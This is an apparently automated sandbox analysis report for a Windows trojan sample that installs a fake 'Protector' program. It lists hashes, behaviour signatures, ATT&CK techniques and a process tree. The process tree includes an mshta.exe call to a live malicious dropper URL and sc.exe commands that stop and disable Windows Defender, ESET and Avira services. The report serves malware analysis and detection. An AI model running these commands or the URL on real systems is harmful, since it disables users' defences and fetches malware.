Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

8803b11dfd...18.exe

windows7-x64

10

8803b11dfd...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    10/08/2024, 22:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe

  • Size

    2.0MB

  • MD5

    8803b11dfdd25468983d1d2f9ff97f14

  • SHA1

    ddbfe075d202f0eb40643fc989258f06e0a4ee0f

  • SHA256

    525d10cdb850eec48d493440924e00fea92722bfb3f8ccb34e2c3bac768d76ab

  • SHA512

    017ead1ddc34515c9fe67a7ac4aa8da142f12c2453c8af0aa52604b893bc8379d77acba7457bd42159707d06a01b8b297b08ffac325eddef2e8ff88b246c4382

  • SSDEEP

    49152:DyqU/32OZXgeL+9yX9MyJiCkFhSp1BRjbzQh7LHQjr//Wk:DkRX+cXF/jXBNbG7Lwd

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.online-secure-pay.info/?0=154&1=0&2=1&3=24&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=spwmsjcvew&14=1

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Disables taskbar notifications via registry modification
    evasion
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\temp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\temp.exe" -e -p1331792007
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filesystemscan.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filesystemscan.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Users\Admin\AppData\Local\Protector-nua.exe
          C:\Users\Admin\AppData\Local\Protector-nua.exe
          4⤵
          • UAC bypass
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2928
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://galaint.online-secure-pay.info/?0=154&1=0&2=1&3=24&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=spwmsjcvew&14=1"
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:1988
          • C:\Windows\SysWOW64\sc.exe
            sc stop WinDefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2860
          • C:\Windows\SysWOW64\sc.exe
            sc config WinDefend start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1144
          • C:\Windows\SysWOW64\sc.exe
            sc stop msmpsvc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1972
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1516
          • C:\Windows\SysWOW64\sc.exe
            sc config ekrn start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:792
          • C:\Windows\SysWOW64\sc.exe
            sc stop AntiVirService
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1464
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirService start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2988
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirSchedulerService start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2528
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FILESY~1.EXE" >> NUL
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2596
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1596
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1596 CREDAT:275457 /prefetch:2
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

2
T1569

Service Execution

2
T1569.002

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Event Triggered Execution

1
T1546

Image File Execution Options Injection

1
T1546.012

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Event Triggered Execution

1
T1546

Image File Execution Options Injection

1
T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Impair Defenses

2
T1562

Disable or Modify Tools

1
T1562.001

Indicator Removal

1
T1070

File Deletion

1
T1070.004

Modify Registry

5
T1112

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Credential Access

Discovery

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

2
T1489

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
    Filesize

    914B

    MD5

    e4a68ac854ac5242460afd72481b2a44

    SHA1

    df3c24f9bfd666761b268073fe06d1cc8d4f82a4

    SHA256

    cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

    SHA512

    5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    b62c7cb55d7b2e448903493bcca9c46a

    SHA1

    a94708a499b35fe3687d9477a1e36365fb96087d

    SHA256

    19cad3d9a6bca9b18a15d02f5dc125f9998c70c202768dc11cba7b505e0d74b0

    SHA512

    8e47bd7ef395846899609462d34cf3a4bf66d46e46090cf241e8c928c789e445b3c191eb206519bdedf1b6bc25990ec30cf3f64f5fadcc665e6c5036e67de5d9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    599a9c3962cb10433ce2f87c7dce9f45

    SHA1

    6fb63945f376b46433a8e6d75d16c105fa5daeca

    SHA256

    1edcc629ae1ea885a95dbb4b90cf1b06a9f55341462642ac4b2184ce6400065b

    SHA512

    8696f6c9daf1b881453b4cdb3c4ce919ed6c9e3629a584e7e0b0a3ac1c5fdde4962caa5c8d1bf7958d45aa6c3d6c93e8367c4e869c08884e47a62e31bb128161

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    0350974829af7480482359d293f2aabe

    SHA1

    d7ede272f6bd807f92e204b570eff82ace22041a

    SHA256

    070e3fc1f9f46e6aaf3e1cacdf74a84086ae43189f2297d5c477ecf63dba84e2

    SHA512

    9402244d8b41876675942ec5be8a2a24fd95904496181aacc54651d2d43c415628cbeea68b69ba34b981d89c7a3787c207a4f57d502d17503c11a97c9376716c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    fe83d045975e826ad9946d6c09df9b6f

    SHA1

    b13baba6ba8211f9cefc918abb30df7105970a69

    SHA256

    a2021fde81a7781f8ed06efc2299b9e0e82b55b5f7f0e8b3a2e8e32c1d2747ce

    SHA512

    654d866f2afd8a12a6cafc2988f44e1634a1a1fbd650b3787995342166c09c220591073b228894e02ade4dfe5ff060cba461766c32ffeadbb2d799b7da9dd42f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    f63af2c2b06096d2add2f602588001a6

    SHA1

    4d265addcfedc2a8766e2195c01200394eb01e20

    SHA256

    5881cb5cbb0e69de1c54f7da6b3afd2023c18ff00f8736898ce2a33c0aa86cb5

    SHA512

    84b6462d03bb442017d7e07236adaaa4b93535a927841804454dfefd662240380301618fece6988038868a08302285ed0dc2f3152a0f9f6bd8010196431f55a6

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    e8ad304f6dbd31e69d085d0a0c240395

    SHA1

    78fed165c7d57cf6fc4740563ccc9874c3d55d31

    SHA256

    cef64d38c613180b251df863f3c1e2e2589653a374cc57b9693fc2357f04f358

    SHA512

    c9332598359854e28599a37a93ff669f5b14a6df35e039b81b7e6dfb039e260b1fbeb97d78c4233b9bd64ea6b377368afa32761692434412c23c3de16b648943

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    2fcafcc03d9231199746a2493bb3e221

    SHA1

    053fcd0cd348c788144bb5e7b2f7915c38e10cbc

    SHA256

    2f9267023f93dcf8cfbb283a25cbeacf3e7d84fe8e046259a9d59755fcf36555

    SHA512

    a29fdcf51d916871a8941713edcd4d3af2f5d2038168e25a413fa03a6601b38b087326f2477280e750a0120b51c51974f6d81e32734f13c33e24e5b1a53ed957

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    c6898e61dd4b3642a070f26ab7432e46

    SHA1

    a674e5c5e6cc8e5b87de449fe8d38605a10cb1c1

    SHA256

    ed04141d3004868cefb4e0e9b6d2b3c2a3f471282c7c8632181e5e205c01e009

    SHA512

    fc0be0e06d832e2d9489a6bcd4902e286b3d9707729985e4b75f46955fd9fb0e83c40661ab5a12ebf5159e8c3fd8d65074a8e9d05480fdbe6b9497f296c51ac1

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    c2b3e55b11616eb167860975bfa68bc1

    SHA1

    4b84610973ae828942659dcce11c05a5e4e91095

    SHA256

    b24fa5ef461a72304633efe244065e2fde4d055232cf972f36694d09a9b1d172

    SHA512

    fdd46e5a858a0f27d77133c5349c59b61850968e71f1048a22eea23a42375d8f20b93cc686df628187ed6c47f0eca082264512a2947722b66a7e211c9b363a7e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    17e4cb40a93b1d69a4f717941e08ced4

    SHA1

    ffa42bb0d9372593d85b9c92faf504419074e176

    SHA256

    2b38818b38595b1ea22e74f5f34ddf0f7cf769506ef44e4cbe3d444b4e919e80

    SHA512

    3e51d32a3a45b43f04136551d8c15771c8747c5a7ef5f538a29bc7d80d5b463440cd4f4fba9ae4d5bb1c0e7a2c04fb7bc0033b0b82c13b5ea29d9c7b3f90c98c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    2d47397c97e7f01b2e4e52906545b4fb

    SHA1

    e55de57c4e5238fb3ecf72a8f08abef0ce51e318

    SHA256

    56400c7d16f02f3114d266bdd008dd77d8495e5b10406e127dcf09eb73ee43cb

    SHA512

    68a8188501a2d07d35beb2f96928a66a349ae52e50d0b0fdd1d255d98230b6e221efbeede1c6acf47d489c261249c0bcdec59743bbd2af52dbf054530040db6b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    242B

    MD5

    23e28975118279a131c4dac7fab3e5ca

    SHA1

    90c2c049d042b5756b86f23d8264596ef00a9197

    SHA256

    4dfd571f4f362c87edd6063d60e27f1582d9b8992656e19401584394f4342b5c

    SHA512

    738652ab817fb39280ea6ebf0029d26c8e52ae28d66d996b300301134613c56e9aac9eb6875eeeab11d22e6c5258286f9168b6d602e9f2eaa631a0861410f0bb

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab3E97.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar3E99.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • \Users\Admin\AppData\Local\Temp\RarSFX0\filesystemscan.exe
    Filesize

    1.9MB

    MD5

    65a93cb59b089bd678ab56b60fb7a060

    SHA1

    5bf9efe4df77c1838fd8d39bf8bc1fa1b63c2a2b

    SHA256

    830f016b394d0ff5e80e510fa7f17e9622287a276ad9dcf58b25f3dc57992922

    SHA512

    40869f6aba6def8accb54b602f92e9d9cb61a721d5225126ef6bba8f057642cfcf834c2a835781bffe13bcdc2e305f9b31cbe000e89d9a3314116fdc2e4e67fc

    Download Submit

  • \Users\Admin\AppData\Local\Temp\RarSFX0\temp.exe
    Filesize

    1.9MB

    MD5

    af211d2b578be48a9ff226c00d53e9f6

    SHA1

    02247608e3dcd6fc6e5fc3b78d086ad60ab4e6f9

    SHA256

    ec75dc6b3fdc9c91e24ec89d6fdd066aefe6319cb967f06e25a2816ec5a8e5b5

    SHA512

    46af84cb4bed22e5383ea9db34f872547bbc2d5d99a0c4c1a029a8160b0fefb6fcecd2264b1ff918f7910b949e8c256c7d6581f154e7167446a19149d08c2012

    Download Submit

  • memory/2684-30-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2684-172-0x0000000005650000-0x0000000005A44000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2684-31-0x0000000005650000-0x0000000005A44000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2684-19-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2764-17-0x0000000003AF0000-0x0000000003EE4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2928-38-0x0000000005430000-0x0000000005440000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2928-501-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2928-171-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2928-182-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2928-32-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2928-55-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download

  • memory/2928-62-0x0000000005AE0000-0x0000000005AE2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2928-1053-0x0000000000400000-0x00000000007F4000-memory.dmp

    Filesize

    4.0MB

    Download